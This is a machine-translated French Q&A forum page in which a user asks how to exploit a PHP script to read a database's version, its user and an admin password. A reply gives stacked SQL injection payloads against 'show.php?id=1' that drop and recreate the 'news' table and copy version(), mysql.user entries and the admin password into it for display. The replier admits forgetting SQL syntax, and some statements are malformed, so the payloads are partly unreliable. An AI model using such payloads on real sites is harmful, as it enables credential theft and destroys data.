- communauté
- Apprendre
- Bibliothèque d'outils
- Loisirs
Maison > Questions et réponses > le corps du texte
Il existe un tel morceau de code php
Veuillez me dire comment utiliser le script pour interroger la version de la base de données, l'utilisateur de la base de données et le contenu du mot de passe avec le champ 1
習慣沉默2017-06-13 09:23:39
Tu sais, si c'était moi, je pourrais essayer de faire ça. . .
L'injection SQL ne nécessite que quelques principes simples. . .
J'ai oublié toute la syntaxe SQL. . . Si la grammaire est incorrecte, vérifiez-la vous-même et corrigez-la. . .
# 获得数据库版本
show.php?id=1;drop table news; create table news(title char(1024),id int); insert into news values(select version(), 1);
show.php?id=1
# 获取数据库用户
show.php?id=1;drop table news; create table news(title char(1024), id int); select user,1 from mysql.user into news;
show.php?id=1
# 获取表admin ID为1字段password的内容
show.php?id=1;drop table news; create table news(title char(1024), id int); select password, 1 from admin where id = 1 into news;
show.php?id=1C'est vrai. . D’une manière générale, ne le faites pas avec autant de brio. . .
Renommer la nouvelle originale. Après avoir vérifié toutes les informations, supprimez la nouvelle inutile et renommez-la. . . Mais j'ai oublié la déclaration de renommage. . .